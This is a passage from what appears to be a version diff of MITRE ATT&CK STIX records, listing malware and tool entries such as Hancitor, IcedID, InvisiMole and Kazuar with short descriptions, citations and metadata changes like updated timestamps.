{\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:53.772000+00:00\", \"old_value\": \"2025-04-16 20:38:39.195000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4b62ab58-c23b-4704-9c15-edd568cd59f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:35.389000+00:00", + "modified": "2025-04-25 14:43:13.563000+00:00", + "name": "Hacking Team UEFI Rootkit", + "description": "[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. 
(Citation: TrendMicro Hacking Team UEFI)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0047", + "external_id": "S0047" + }, + { + "source_name": "TrendMicro Hacking Team UEFI", + "description": "Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Hacking Team UEFI Rootkit" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:13.563000+00:00\", \"old_value\": \"2025-04-16 20:38:05.792000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-08-12 19:32:56.301000+00:00", + "modified": "2025-04-25 14:45:01.455000+00:00", + "name": "Hancitor", + "description": "[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0499", + "external_id": "S0499" + }, + { + 
"source_name": "Chanitor", + "description": "(Citation: FireEye Hancitor)" + }, + { + "source_name": "Threatpost Hancitor", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/" + }, + { + "source_name": "FireEye Hancitor", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Hancitor", + "Chanitor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:01.455000+00:00\", \"old_value\": \"2025-04-16 20:38:42.270000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:31.679000+00:00", + "name": "Havij", + "description": "[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. 
(Citation: Check Point Havij Analysis)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0224", + "external_id": "S0224" + }, + { + "source_name": "Check Point Havij Analysis", + "description": "Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.", + "url": "https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:31.679000+00:00\", \"old_value\": \"2025-04-16 20:38:57.107000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2cf7dec3-66fc-423f-b2c7-58f1de243b4e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-02 20:48:23.462000+00:00", + "modified": "2025-04-25 14:42:55.977000+00:00", + "name": "HyperStack", + "description": "[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. 
[HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0537", + "external_id": "S0537" + }, + { + "source_name": "Accenture HyperStack October 2020", + "description": "Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HyperStack" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:55.977000+00:00\", \"old_value\": \"2025-04-16 20:38:00.476000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--5be33fef-39c0-4532-84ee-bea31e1b5324", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:43:29.589000+00:00", + "name": "ISMInjector", + "description": "[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. 
(Citation: OilRig New Delivery Oct 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0189", + "external_id": "S0189" + }, + { + "source_name": "ISMInjector", + "description": "(Citation: OilRig New Delivery Oct 2017)" + }, + { + "source_name": "OilRig New Delivery Oct 2017", + "description": "Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ISMInjector" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Robert Falcone" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:29.589000+00:00\", \"old_value\": \"2025-04-16 20:38:11.226000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-15 17:55:11.252000+00:00", + "modified": "2025-04-22 22:16:09.049000+00:00", + "name": "IcedID", + "description": "[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. 
[IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0483", + "external_id": "S0483" + }, + { + "source_name": "IBM IcedID November 2017", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" + }, + { + "source_name": "Juniper IcedID June 2020", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "IcedID" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jorge Orchilles", + "Zaw Min Htun, @Z3TAE", + "Matt Brenton, Zurich Global Information Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:16:09.049000+00:00\", \"old_value\": \"2024-10-28 19:20:20.633000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][2]\": \"Matt Brenton, Zurich Global Information Security\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][1]\": \"Matt Brenton\"}}", + "previous_version": 
"1.2" + }, + { + "type": "malware", + "id": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:39.436000+00:00", + "name": "InnaputRAT", + "description": "[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim\u2019s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0259", + "external_id": "S0259" + }, + { + "source_name": "InnaputRAT", + "description": "(Citation: ASERT InnaputRAT April 2018)" + }, + { + "source_name": "ASERT InnaputRAT April 2018", + "description": "ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. 
Retrieved July 9, 2018.", + "url": "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "InnaputRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:39.436000+00:00\", \"old_value\": \"2025-04-16 20:38:34.903000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:10.665000+00:00", + "name": "InvisiMole", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. 
[Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0260", + "external_id": "S0260" + }, + { + "source_name": "InvisiMole", + "description": "(Citation: ESET InvisiMole June 2018)" + }, + { + "source_name": "ESET InvisiMole June 2018", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. 
Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "InvisiMole" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:10.665000+00:00\", \"old_value\": \"2025-04-16 20:38:05.140000+00:00\"}}}", + "previous_version": "2.1" + }, + { + "type": "malware", + "id": "malware--aaf3fa65-8b27-4e68-91de-2b7738fe4c82", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-18 17:20:43.635000+00:00", + "modified": "2025-04-25 14:44:21.898000+00:00", + "name": "JCry", + "description": "[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0389", + "external_id": "S0389" + }, + { + "source_name": "JCry", + "description": "(Citation: Carbon Black JCry May 2019)" + }, + { + "source_name": "Carbon Black JCry May 2019", + "description": "Lee, S.. (2019, May 14). JCry Ransomware. 
Retrieved June 18, 2019.", + "url": "https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "JCry" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:21.898000+00:00\", \"old_value\": \"2025-04-16 20:38:29.735000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--de6cb631-52f6-4169-a73b-7965390b0c30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:51.758000+00:00", + "name": "JPIN", + "description": "[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0201", + "external_id": "S0201" + }, + { + "source_name": "JPIN", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. 
Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "JPIN" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:51.758000+00:00\", \"old_value\": \"2025-04-16 20:38:38.557000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f559f945-eb8b-48b1-904c-68568deebed3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-22 14:44:48.087000+00:00", + "modified": "2025-04-25 14:45:05.560000+00:00", + "name": "JSS Loader", + "description": "[JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0648", + "external_id": "S0648" + }, + { + "source_name": "eSentire FIN7 July 2021", + "description": "eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels\u2019 Owner, Brown-Forman Inc.. 
Retrieved September 20, 2021.", + "url": "https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "JSS Loader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:05.560000+00:00\", \"old_value\": \"2025-04-16 20:38:43.545000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--64122557-5940-4271-9123-25bfc0c693db", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-09 18:32:18.369000+00:00", + "modified": "2025-04-25 14:43:35.588000+00:00", + "name": "Javali", + "description": "[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0528", + "external_id": "S0528" + }, + { + 
"source_name": "Securelist Brazilian Banking Malware July 2020", + "description": "GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.", + "url": "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Javali" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:35.588000+00:00\", \"old_value\": \"2025-04-16 20:38:13.353000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:43.623000+00:00", + "name": "KEYMARBLE", + "description": "[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0271", + "external_id": "S0271" + }, + { + "source_name": "KEYMARBLE", + "description": "(Citation: US-CERT KEYMARBLE Aug 2018)" + }, + { + "source_name": "US-CERT KEYMARBLE Aug 2018", + "description": "US-CERT. (2018, August 09). MAR-10135536-17 \u2013 North Korean Trojan: KEYMARBLE. 
Retrieved August 16, 2018.", + "url": "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "KEYMARBLE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:43.623000+00:00\", \"old_value\": \"2025-04-16 20:37:56.418000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--7dbb67c7-270a-40ad-836e-c45f8948aa5a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:43:51.104000+00:00", + "name": "KOMPROGO", + "description": "[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0156", + "external_id": "S0156" + }, + { + "source_name": "KOMPROGO", + "description": "(Citation: FireEye APT32 May 2017)" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. 
Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "KOMPROGO" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:51.104000+00:00\", \"old_value\": \"2025-04-16 20:38:19.228000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--26fed817-e7bf-41f9-829a-9075ffac45c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:57.344000+00:00", + "modified": "2025-04-25 14:42:52.151000+00:00", + "name": "Kasidet", + "description": "[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0088", + "external_id": "S0088" + }, + { + "source_name": "Zscaler Kasidet", + "description": "Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. 
Retrieved March 24, 2016.", + "url": "http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kasidet" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:52.151000+00:00\", \"old_value\": \"2025-04-16 20:37:58.992000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--536be338-e2ef-4a6b-afb6-8d5568b91eb2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:19.859000+00:00", + "name": "Kazuar", + "description": "[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0265", + "external_id": "S0265" + }, + { + "source_name": "Kazuar", + "description": "(Citation: Unit 42 Kazuar May 2017)" + }, + { + "source_name": "Unit 42 Kazuar May 2017", + "description": "Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. 
